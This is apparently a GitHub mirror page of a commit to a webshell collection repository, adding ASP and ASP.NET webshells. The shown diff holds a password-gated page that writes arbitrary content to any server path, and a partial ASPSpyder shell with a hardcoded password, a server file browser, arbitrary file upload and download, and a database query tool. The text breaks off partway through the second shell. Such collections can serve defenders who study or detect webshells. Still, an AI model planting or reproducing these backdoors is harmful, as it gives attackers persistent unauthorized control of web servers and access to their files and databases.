mirror of
https://github.com/tennc/webshell
synced 2024-11-13 23:17:10 +00:00
add asp webshell
This commit is contained in:
parent
8837894df0
commit
0119015514
10 changed files with 6771 additions and 0 deletions
57
asp/08小组内部交流专用.asp.txt
Normal file
57
asp/08小组内部交流专用.asp.txt
Normal file
|
@ -0,0 +1,57 @@
|
||||||
|
<%@ Page Language="C#" AutoEventWireup="true" validateRequest="false"%>
|
||||||
|
<html>
|
||||||
|
<head runat="server">
|
||||||
|
<title>08小组内部交流专用 www.huc08.com</title>
|
||||||
|
<style type="text/css">
|
||||||
|
.btn{
|
||||||
|
background-color:transparent;
|
||||||
|
color:#00FF00;
|
||||||
|
border:1px solid #00FF00;
|
||||||
|
font-size:12px;
|
||||||
|
font-weight:bold;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
<script language="c#" runat="server">
|
||||||
|
void Page_Load(object sender, EventArgs e)
|
||||||
|
{
|
||||||
|
this.lblthispath.Text = Server.MapPath(Request.ServerVariables["PATH_INFO"]);
|
||||||
|
}
|
||||||
|
void btnUpload_Click(object sender, EventArgs e)
|
||||||
|
{
|
||||||
|
string password = "TNTHK";
|
||||||
|
if (password.Equals(this.txtPass.Text))
|
||||||
|
{
|
||||||
|
System.IO.StreamWriter sw = new System.IO.StreamWriter(this.txtPath.Text,true,System.Text.Encoding.GetEncoding("gb2312"));
|
||||||
|
sw.Write(this.txtContext.Text);
|
||||||
|
sw.Flush();
|
||||||
|
sw.Close();
|
||||||
|
Response.Write("上传成功!");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
Response.Write("擦!哥的马子你也敢泡!");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body style="font-size:12px;font-weight:bold;color:#00FF00;font-family:Arial, Helvetica, sans-serif;background-color:#000000;">
|
||||||
|
<form id="form1" runat="server">
|
||||||
|
<div>
|
||||||
|
本文件路径:<asp:Label runat="server" ID="lblthispath" Text=""></asp:Label>
|
||||||
|
<br />
|
||||||
|
<br />
|
||||||
|
上传的口令:<asp:TextBox runat="server" ID="txtPass" Width="400px"></asp:TextBox>
|
||||||
|
<br />
|
||||||
|
<br />
|
||||||
|
上传的路径:<asp:TextBox runat="server" ID="txtPath" Width="400px" ></asp:TextBox>
|
||||||
|
<br />
|
||||||
|
<br />
|
||||||
|
上传的内容:<asp:TextBox runat="server" ID="txtContext" Width="400px" Height="250px" TextMode="MultiLine"></asp:TextBox>
|
||||||
|
<br />
|
||||||
|
<br />
|
||||||
|
<br />
|
||||||
|
<asp:Button runat="server" ID="btnUpload" text="上传" CssClass="btn" OnClick="btnUpload_Click"/>
|
||||||
|
</div>
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
1870
asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp.txt
Normal file
1870
asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp.txt
Normal file
File diff suppressed because it is too large
Load diff
827
asp/aspydrv.asp.txt
Normal file
827
asp/aspydrv.asp.txt
Normal file
|
@ -0,0 +1,827 @@
|
||||||
|
<%
|
||||||
|
Function BufferContent(data)
|
||||||
|
Dim strContent(64)
|
||||||
|
Dim i
|
||||||
|
ClearString strContent
|
||||||
|
For i = 1 To LenB(data)
|
||||||
|
AddString strContent,Chr(AscB(MidB(data,i,1)))
|
||||||
|
Next
|
||||||
|
BufferContent = fnReadString(strContent)
|
||||||
|
End Function
|
||||||
|
|
||||||
|
Sub ClearString(part)
|
||||||
|
Dim index
|
||||||
|
For index = 0 to 64
|
||||||
|
part(index)=""
|
||||||
|
Next
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
Sub AddString(part,newString)
|
||||||
|
Dim tmp
|
||||||
|
Dim index
|
||||||
|
part(0) = part(0) & newString
|
||||||
|
If Len(part(0)) > 64 Then
|
||||||
|
index=0
|
||||||
|
tmp=""
|
||||||
|
Do
|
||||||
|
tmp=part(index) & tmp
|
||||||
|
part(index) = ""
|
||||||
|
index = index + 1
|
||||||
|
Loop until part(index) = ""
|
||||||
|
part(index) = tmp
|
||||||
|
End If
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
Function fnReadString(part)
|
||||||
|
Dim tmp
|
||||||
|
Dim index
|
||||||
|
tmp = ""
|
||||||
|
For index = 0 to 64
|
||||||
|
If part(index) <> "" Then
|
||||||
|
tmp = part(index) & tmp
|
||||||
|
End If
|
||||||
|
Next
|
||||||
|
FnReadString = tmp
|
||||||
|
End Function
|
||||||
|
|
||||||
|
|
||||||
|
Class FileUploader
|
||||||
|
Public Files
|
||||||
|
Private mcolFormElem
|
||||||
|
Private Sub Class_Initialize()
|
||||||
|
Set Files = Server.CreateObject("Scripting.Dictionary")
|
||||||
|
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
Private Sub Class_Terminate()
|
||||||
|
If IsObject(Files) Then
|
||||||
|
Files.RemoveAll()
|
||||||
|
Set Files = Nothing
|
||||||
|
End If
|
||||||
|
If IsObject(mcolFormElem) Then
|
||||||
|
mcolFormElem.RemoveAll()
|
||||||
|
Set mcolFormElem = Nothing
|
||||||
|
End If
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
Public Property Get Form(sIndex)
|
||||||
|
Form = ""
|
||||||
|
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
|
||||||
|
End Property
|
||||||
|
|
||||||
|
Public Default Sub Upload()
|
||||||
|
Dim biData, sInputName
|
||||||
|
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
|
||||||
|
Dim nPosFile, nPosBound
|
||||||
|
biData = Request.BinaryRead(Request.TotalBytes)
|
||||||
|
nPosBegin = 1
|
||||||
|
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
|
||||||
|
If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
|
||||||
|
vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
|
||||||
|
nDataBoundPos = InstrB(1, biData, vDataBounds)
|
||||||
|
Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
|
||||||
|
nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
|
||||||
|
nPos = InstrB(nPos, biData, CByteString("name="))
|
||||||
|
nPosBegin = nPos + 6
|
||||||
|
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
|
||||||
|
sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||||
|
nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
|
||||||
|
nPosBound = InstrB(nPosEnd, biData, vDataBounds)
|
||||||
|
If nPosFile <> 0 And nPosFile < nPosBound Then
|
||||||
|
Dim oUploadFile, sFileName
|
||||||
|
Set oUploadFile = New UploadedFile
|
||||||
|
nPosBegin = nPosFile + 10
|
||||||
|
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
|
||||||
|
sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||||
|
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
|
||||||
|
nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
|
||||||
|
nPosBegin = nPos + 14
|
||||||
|
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
|
||||||
|
oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||||
|
nPosBegin = nPosEnd+4
|
||||||
|
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
|
||||||
|
oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
|
||||||
|
If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
|
||||||
|
Else
|
||||||
|
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
|
||||||
|
nPosBegin = nPos + 4
|
||||||
|
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
|
||||||
|
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
|
||||||
|
End If
|
||||||
|
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
|
||||||
|
Loop
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
'String to byte string conversion
|
||||||
|
Private Function CByteString(sString)
|
||||||
|
Dim nIndex
|
||||||
|
For nIndex = 1 to Len(sString)
|
||||||
|
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
|
||||||
|
Next
|
||||||
|
End Function
|
||||||
|
|
||||||
|
'Byte string to string conversion
|
||||||
|
Private Function CWideString(bsString)
|
||||||
|
Dim nIndex
|
||||||
|
CWideString =""
|
||||||
|
For nIndex = 1 to LenB(bsString)
|
||||||
|
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
|
||||||
|
Next
|
||||||
|
End Function
|
||||||
|
End Class
|
||||||
|
|
||||||
|
|
||||||
|
Class UploadedFile
|
||||||
|
Public ContentType
|
||||||
|
Public FileName
|
||||||
|
Public FileData
|
||||||
|
Public Property Get FileSize()
|
||||||
|
FileSize = LenB(FileData)
|
||||||
|
End Property
|
||||||
|
|
||||||
|
Public Sub SaveToDisk(sPath)
|
||||||
|
Dim oFS, oFile
|
||||||
|
Dim nIndex
|
||||||
|
If sPath = "" Or FileName = "" Then Exit Sub
|
||||||
|
If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
|
||||||
|
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
|
||||||
|
If Not oFS.FolderExists(sPath) Then Exit Sub
|
||||||
|
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
|
||||||
|
' output mechanism modified for buffering
|
||||||
|
oFile.Write BufferContent(FileData)
|
||||||
|
oFile.Close
|
||||||
|
End Sub
|
||||||
|
|
||||||
|
Public Sub SaveToDatabase(ByRef oField)
|
||||||
|
If LenB(FileData) = 0 Then Exit Sub
|
||||||
|
If IsObject(oField) Then
|
||||||
|
oField.AppendChunk FileData
|
||||||
|
End If
|
||||||
|
End Sub
|
||||||
|
End Class
|
||||||
|
|
||||||
|
' Create the FileUploader
|
||||||
|
IF REQUEST.QueryString("upload")="@" THEN
|
||||||
|
Dim Uploader, File
|
||||||
|
Set Uploader = New FileUploader
|
||||||
|
|
||||||
|
' This starts the upload process
|
||||||
|
Uploader.Upload()
|
||||||
|
|
||||||
|
%>
|
||||||
|
<html><title>ASPYDrvsInfo</title>
|
||||||
|
<style>
|
||||||
|
<!--
|
||||||
|
A:link {font-style: text-decoration: none; color: #c8c8c8}
|
||||||
|
A:visited {font-style: text-decoration: none; color: #777777}
|
||||||
|
A:active {font-style: text-decoration: none; color: #ff8300}
|
||||||
|
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
|
||||||
|
* {scrollbar-base-color:#777777;
|
||||||
|
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
|
||||||
|
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
|
||||||
|
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
|
||||||
|
//-->
|
||||||
|
</style>
|
||||||
|
<body bgcolor=black text=white>
|
||||||
|
<BR><BR><BR>
|
||||||
|
<center><table bgcolor="#505050" cellpadding=4>
|
||||||
|
<tr><td><Font face=arial size=-1>File upload Information:</font>
|
||||||
|
</td></tr><tr><td bgcolor=black ><table>
|
||||||
|
<%
|
||||||
|
|
||||||
|
' Check if any files were uploaded
|
||||||
|
If Uploader.Files.Count = 0 Then
|
||||||
|
Response.Write "File(s) not uploaded."
|
||||||
|
Else
|
||||||
|
' Loop through the uploaded files
|
||||||
|
For Each File In Uploader.Files.Items
|
||||||
|
File.SaveToDisk Request.QueryString("txtpath")
|
||||||
|
Response.Write "<TR><TD> </TD></TR><tr><td><font color=gray>File Uploaded: </font></td><td>" & File.FileName & "</td></tr>"
|
||||||
|
Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(File.FileSize/1024)+1 & " kb</td></tr>"
|
||||||
|
Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File.ContentType & "</td></tr>"
|
||||||
|
Next
|
||||||
|
End If
|
||||||
|
%>
|
||||||
|
<TR><TD> </TD></TR></table>
|
||||||
|
</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
|
||||||
|
<%
|
||||||
|
response.End() '---- XXX
|
||||||
|
END IF
|
||||||
|
'--------
|
||||||
|
ON ERROR RESUME NEXT
|
||||||
|
Response.Buffer = True
|
||||||
|
password = "t00ls.org" ' <---Your password here
|
||||||
|
|
||||||
|
If request.querystring("logoff")="@" then
|
||||||
|
session("shagman")="" ' Logged off
|
||||||
|
session("dbcon")="" ' Database Connection
|
||||||
|
session("txtpath")="" ' any pathinfo
|
||||||
|
end if
|
||||||
|
|
||||||
|
If (session("shagman")<>password) and Request.form("code")="" Then
|
||||||
|
%>
|
||||||
|
<body bgcolor=black><center><BR><BR><BR><BR><FONT face=arial size=-2 color=#ff8300>ADMINSTRATORS TOOLKIT</FONT><BR><BR><BR>
|
||||||
|
<table><tr><td>
|
||||||
|
<FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" >
|
||||||
|
<table bgcolor=#505050 width="20%" cellpadding=20 ><tr><td bgcolor=#303030 align=center >
|
||||||
|
<INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access ">
|
||||||
|
</td></tr></table>
|
||||||
|
</td></tr><tr><td align=right>
|
||||||
|
<font color=white size=-2 face=arial >ASPSpyder Apr2003</font></td></tr>
|
||||||
|
</td></tr></table></FORM>
|
||||||
|
<%If request.querystring("logoff")="@" then%>
|
||||||
|
<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
|
||||||
|
<%end if%>
|
||||||
|
<center>
|
||||||
|
<%
|
||||||
|
Response.END
|
||||||
|
End If
|
||||||
|
If Request.form("code") = password or session("shagman") = password Then
|
||||||
|
session("shagman") = password
|
||||||
|
Else
|
||||||
|
Response.Write "<BR><B><P align=center><font color=red ><b>ACCESS DENIED</B></font><BR><font color=Gray >Copyright 2003 Vela iNC.</font></p>"
|
||||||
|
Response.END
|
||||||
|
End If
|
||||||
|
|
||||||
|
server.scriptTimeout=180
|
||||||
|
set fso = Server.CreateObject("Scripting.FileSystemObject")
|
||||||
|
mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
|
||||||
|
mapPathLen = len(mapPath)
|
||||||
|
|
||||||
|
if session(myScriptName) = "" then
|
||||||
|
for x = mapPathLen to 0 step -1
|
||||||
|
myScriptName = mid(mapPath,x)
|
||||||
|
if instr(1,myScriptName,"\")>0 then
|
||||||
|
myScriptName = mid(mapPath,x+1)
|
||||||
|
x=0
|
||||||
|
session(myScriptName) = myScriptName
|
||||||
|
end if
|
||||||
|
next
|
||||||
|
Else
|
||||||
|
myScriptName = session(myScriptName)
|
||||||
|
end if
|
||||||
|
|
||||||
|
|
||||||
|
wwwRoot = left(mapPath, mapPathLen - len(myScriptName))
|
||||||
|
Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files will be DUMPED Too and From
|
||||||
|
|
||||||
|
if len(Request.querystring("txtpath"))=3 then
|
||||||
|
pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form("Fname")
|
||||||
|
else
|
||||||
|
pathname = Request.querystring("txtpath") & "\" & Request.form("Fname")
|
||||||
|
end if
|
||||||
|
|
||||||
|
If Request.Form("txtpath") = "" Then
|
||||||
|
MyPath = Request.QueryString("txtpath")
|
||||||
|
Else
|
||||||
|
MyPath = Request.Form("txtpath")
|
||||||
|
End If
|
||||||
|
|
||||||
|
' ---Path correction routine
|
||||||
|
If len(MyPath)=1 then MyPath=MyPath & ":\"
|
||||||
|
If len(MyPath)=2 then MyPath=MyPath & "\"
|
||||||
|
If MyPath = "" Then MyPath = wwwRoot
|
||||||
|
If not fso.FolderExists(MyPath) then
|
||||||
|
Response.Write "<font face=arial size=+2>Non-existing path specified.<BR>Please use browser back button to continue !"
|
||||||
|
Response.end
|
||||||
|
end if
|
||||||
|
|
||||||
|
set folder = fso.GetFolder(MyPath)
|
||||||
|
|
||||||
|
if fso.GetFolder(Target) = false then
|
||||||
|
Response.Write "<font face=arial size=-2 color=red>Please create your target directory for copying files as it does not exist. </font><font face=arial size=-1 color=red>" & Target & "<BR></font>"
|
||||||
|
else
|
||||||
|
set fileCopy = fso.GetFolder(Target)
|
||||||
|
end if
|
||||||
|
|
||||||
|
|
||||||
|
If Not(folder.IsRootFolder) Then
|
||||||
|
If len(folder.ParentFolder)>3 then
|
||||||
|
showPath = folder.ParentFolder & "\" & folder.name
|
||||||
|
Else
|
||||||
|
showPath = folder.ParentFolder & folder.name
|
||||||
|
End If
|
||||||
|
Else
|
||||||
|
showPath = left(MyPath,2)
|
||||||
|
End If
|
||||||
|
|
||||||
|
MyPath=showPath
|
||||||
|
showPath=MyPath & "\"
|
||||||
|
' ---Path correction routine-DONE
|
||||||
|
|
||||||
|
set drv=fso.GetDrive(left(MyPath,2))
|
||||||
|
|
||||||
|
if Request.Form("cmd")="Download" then
|
||||||
|
if Request.Form("Fname")<>"" then
|
||||||
|
Response.Buffer = True
|
||||||
|
Response.Clear
|
||||||
|
strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname")
|
||||||
|
Set Sys = Server.CreateObject( "Scripting.FileSystemObject" )
|
||||||
|
Set Bin = Sys.OpenTextFile( strFileName, 1, False )
|
||||||
|
Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") )
|
||||||
|
Response.ContentType = "application/octet-stream"
|
||||||
|
While Not Bin.AtEndOfStream
|
||||||
|
Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) )
|
||||||
|
Wend
|
||||||
|
Bin.Close : Set Bin = Nothing
|
||||||
|
Set Sys = Nothing
|
||||||
|
Else
|
||||||
|
err.number=500
|
||||||
|
err.description="Nothing selected for download..."
|
||||||
|
End if
|
||||||
|
End if
|
||||||
|
%>
|
||||||
|
<html>
|
||||||
|
<style>
|
||||||
|
<!--
|
||||||
|
A:link {font-style: text-decoration: none; color: #c8c8c8}
|
||||||
|
A:visited {font-style: text-decoration: none; color: #777777}
|
||||||
|
A:active {font-style: text-decoration: none; color: #ff8300}
|
||||||
|
A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
|
||||||
|
* {scrollbar-base-color:#777777;
|
||||||
|
scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
|
||||||
|
scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
|
||||||
|
input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
|
||||||
|
//-->
|
||||||
|
</style>
|
||||||
|
<%
|
||||||
|
'QUERY ANALYSER -- START
|
||||||
|
if request.QueryString("qa")="@" then
|
||||||
|
'-------------
|
||||||
|
sub getTable(mySQL)
|
||||||
|
if mySQL="" then
|
||||||
|
exit sub
|
||||||
|
end if
|
||||||
|
on error resume next
|
||||||
|
Response.Buffer = True
|
||||||
|
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
|
||||||
|
myConnectionString=session("dbCon")
|
||||||
|
Set myDBConnection = Server.CreateObject("ADODB.Connection")
|
||||||
|
myDBConnection.Open myConnectionString
|
||||||
|
myFlag = False
|
||||||
|
myFlag = errChk()
|
||||||
|
set rs = Server.CreateObject("ADODB.Recordset")
|
||||||
|
rs.cursorlocation = 3
|
||||||
|
rs.open mySQL, myDBConnection
|
||||||
|
myFlag = errChk()
|
||||||
|
|
||||||
|
if RS.properties("Asynchronous Rowset Processing") = 16 then
|
||||||
|
For i = 0 To rs.Fields.Count - 1
|
||||||
|
myFields = myFields & "<TD><font color=#eeeeee size=2 face=""Verdana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></TD>"
|
||||||
|
Next
|
||||||
|
myTitle = "<font color=gray size=6 face=webdings>?</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font> <font color=gray><TT>(" & rs.RecordCount & " row(s) affected)</TT><br>"
|
||||||
|
rs.MoveFirst
|
||||||
|
rs.PageSize=mNR
|
||||||
|
if int(rs.RecordCount/mNR) < mPage then mPage=1
|
||||||
|
rs.AbsolutePage = mPage
|
||||||
|
Response.Write myTitle & "</td><td> "
|
||||||
|
if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value="" << "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value="" << "">")
|
||||||
|
Response.Write "<select name=cmbPageSelect>"
|
||||||
|
For x = 1 to rs.PageCount
|
||||||
|
if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</option>") else Response.Write("<option value=" & x & ">" & x & "</option>")
|
||||||
|
Next
|
||||||
|
Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">"
|
||||||
|
if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value="" >> "" DISABLED>") else Response.Write("<input type=button name=btnPageNext value="" >> "">")
|
||||||
|
Response.Write " <font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>"
|
||||||
|
response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding=2><TR align=center valign=middle bgcolor=#777777>" & myFields
|
||||||
|
|
||||||
|
For x = 1 to rs.PageSize
|
||||||
|
If Not rs.EOF Then
|
||||||
|
response.Write "<TR>"
|
||||||
|
For i = 0 to rs.Fields.Count - 1
|
||||||
|
response.Write "<TD bgcolor=#dddddd>" & server.HTMLEncode(rs(i)) & "</TD>"
|
||||||
|
Next
|
||||||
|
response.Write "</TR>"
|
||||||
|
response.Flush()
|
||||||
|
rs.MoveNext
|
||||||
|
Else
|
||||||
|
x=rs.PageSize
|
||||||
|
End If
|
||||||
|
Next
|
||||||
|
response.Write "</Table>"
|
||||||
|
myFlag = errChk()
|
||||||
|
|
||||||
|
else
|
||||||
|
if not myFlag then
|
||||||
|
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font> <font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
|
||||||
|
response.Write myTitle
|
||||||
|
end if
|
||||||
|
end if
|
||||||
|
set myDBConnection = nothing
|
||||||
|
set rs2 = nothing
|
||||||
|
set rs = nothing
|
||||||
|
|
||||||
|
End sub
|
||||||
|
|
||||||
|
sub getXML(mySQL)
|
||||||
|
if mySQL="" then
|
||||||
|
exit sub
|
||||||
|
end if
|
||||||
|
on error resume next
|
||||||
|
Response.Buffer = True
|
||||||
|
Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
|
||||||
|
myConnectionString=session("dbCon")
|
||||||
|
Set myDBConnection = Server.CreateObject("ADODB.Connection")
|
||||||
|
myDBConnection.Open myConnectionString
|
||||||
|
myFlag = False
|
||||||
|
myFlag = errChk()
|
||||||
|
set rs = Server.CreateObject("ADODB.Recordset")
|
||||||
|
rs.cursorlocation = 3
|
||||||
|
rs.open mySQL, myDBConnection
|
||||||
|
myFlag = errChk()
|
||||||
|
if RS.properties("Asynchronous Rowset Processing") = 16 then
|
||||||
|
Response.Write "<font color=#55ff55 size=4 face=webdings>i</font><font color=#cccccc> Copy paste this code and save as '.xml '</font></td></tr><tr><td>"
|
||||||
|
Response.Write "<textarea cols=75 name=txtXML rows=15>"
|
||||||
|
rs.MoveFirst
|
||||||
|
response.Write vbcrlf & "<?xml version=""1.0"" ?>"
|
||||||
|
response.Write vbcrlf & "<TableXML>"
|
||||||
|
Do While Not rs.EOF
|
||||||
|
response.Write vbcrlf & "<Column>"
|
||||||
|
For i = 0 to rs.Fields.Count - 1
|
||||||
|
response.Write vbcrlf & "<" & rs.Fields(i).Name & ">" & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf
|
||||||
|
response.Flush()
|
||||||
|
Next
|
||||||
|
response.Write "</Column>"
|
||||||
|
rs.MoveNext
|
||||||
|
Loop
|
||||||
|
response.Write "</TableXML>"
|
||||||
|
response.Write "</textarea>"
|
||||||
|
myFlag = errChk()
|
||||||
|
|
||||||
|
else
|
||||||
|
if not myFlag then
|
||||||
|
myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font> <font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
|
||||||
|
response.Write myTitle
|
||||||
|
end if
|
||||||
|
end if
|
||||||
|
End sub
|
||||||
|
|
||||||
|
Function errChk()
|
||||||
|
if err.Number <> 0 and err.Number <> 13 then
|
||||||
|
dim myText
|
||||||
|
myText = "<font color=#ff8300 size=4 face=webdings>x</font><font color=red size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Description & "</font><BR>"
|
||||||
|
response.Write myText
|
||||||
|
err.Number = 0
|
||||||
|
errChk = True
|
||||||
|
end if
|
||||||
|
end Function
|
||||||
|
|
||||||
|
Dim myQuery,mPage,mNR
|
||||||
|
myQuery = request.Form("txtSQL")
|
||||||
|
if request.form("txtCon") <> "" then session("dbcon") = request.form("txtCon")
|
||||||
|
if request.QueryString("txtpath") then session("txtpath")=request.QueryString("txtpath")
|
||||||
|
mPage=cint(request.Form("mPage"))
|
||||||
|
if mPage<1 then mPage=1
|
||||||
|
mNR=cint(request.Form("txtNoRecords"))
|
||||||
|
if mNR<1 then mNR=30
|
||||||
|
%>
|
||||||
|
<html><title>ASPyQAnalyser</title>
|
||||||
|
<script language="VbScript">
|
||||||
|
sub cmdSubmit_onclick
|
||||||
|
if Document.frmSQL.txtSQL.value = "" then
|
||||||
|
Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHERE " & vbcrlf & "ORDER BY "
|
||||||
|
exit sub
|
||||||
|
end if
|
||||||
|
Document.frmSQL.Submit
|
||||||
|
end sub
|
||||||
|
sub cmdTables_onclick
|
||||||
|
Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysobjects where xtype='U' order by name"
|
||||||
|
Document.frmSQL.Submit
|
||||||
|
end sub
|
||||||
|
sub cmdColumns_onclick
|
||||||
|
strTable =InputBox("Return Columns for which Table?","Table Name...")
|
||||||
|
strTable = Trim(strTable)
|
||||||
|
if len(strTable) > 0 Then
|
||||||
|
SQL = "select name As 'ColumnName',xusertype As 'DataType',length as Length from syscolumns where id=(select id from sysobjects where xtype='U' and name='" & strTable & "') order by name"
|
||||||
|
Document.frmSQL.txtSQL.value = SQL
|
||||||
|
Document.frmSQL.Submit
|
||||||
|
End if
|
||||||
|
end sub
|
||||||
|
sub cmdClear_onclick
|
||||||
|
Document.frmSQL.txtSQL.value = ""
|
||||||
|
end sub
|
||||||
|
sub cmdBack_onclick
|
||||||
|
Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=session("txtpath")%>"
|
||||||
|
end sub
|
||||||
|
Sub btnPagePrev_OnClick
|
||||||
|
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
|
||||||
|
Document.frmSQL.Submit
|
||||||
|
end sub
|
||||||
|
Sub btnPageNext_OnClick
|
||||||
|
Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1
|
||||||
|
Document.frmSQL.Submit
|
||||||
|
end sub
|
||||||
|
Sub cmbPageSelect_onchange
|
||||||
|
Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedIndex + 1)
|
||||||
|
Document.frmSQL.Submit
|
||||||
|
End Sub
|
||||||
|
Sub txtNoRecords_onclick
|
||||||
|
Document.frmSQL.cmbPageSelect.selectedIndex = 0
|
||||||
|
Document.frmSQL.mPage.value = 1
|
||||||
|
End Sub
|
||||||
|
</script>
|
||||||
|
<style>
|
||||||
|
TR {font-family: sans-serif;}
|
||||||
|
</style>
|
||||||
|
<body bgcolor=black>
|
||||||
|
<form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" method=Post>
|
||||||
|
<table border="0"><tr>
|
||||||
|
<td align=right><font color=#ff8300 size="4" face="webdings">@ </font><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste
|
||||||
|
your connection string here : </font><font color="#CCCCCC">
|
||||||
|
<input name=txtCon type="text" size="60" value="<%=session("dbcon")%>">
|
||||||
|
</font><BR>
|
||||||
|
<textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textarea><BR>
|
||||||
|
<input name=cmdSubmit type=button value=Submit><input name=cmdTables type=button value=Tables><input name=cmdColumns type=button value=Columns><input name="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear><input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXML" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML</FONT>
|
||||||
|
</td>
|
||||||
|
<td>XXXXXX</td><td>
|
||||||
|
<center><B>ASP</b><font color=#ff8300 face=webdings size=6 >!</font><B><font color=Gray >Spyder</font> Apr2003</B><BR><font color=black size=-2><TT>by ~sir_shagalot</TT></font></center>
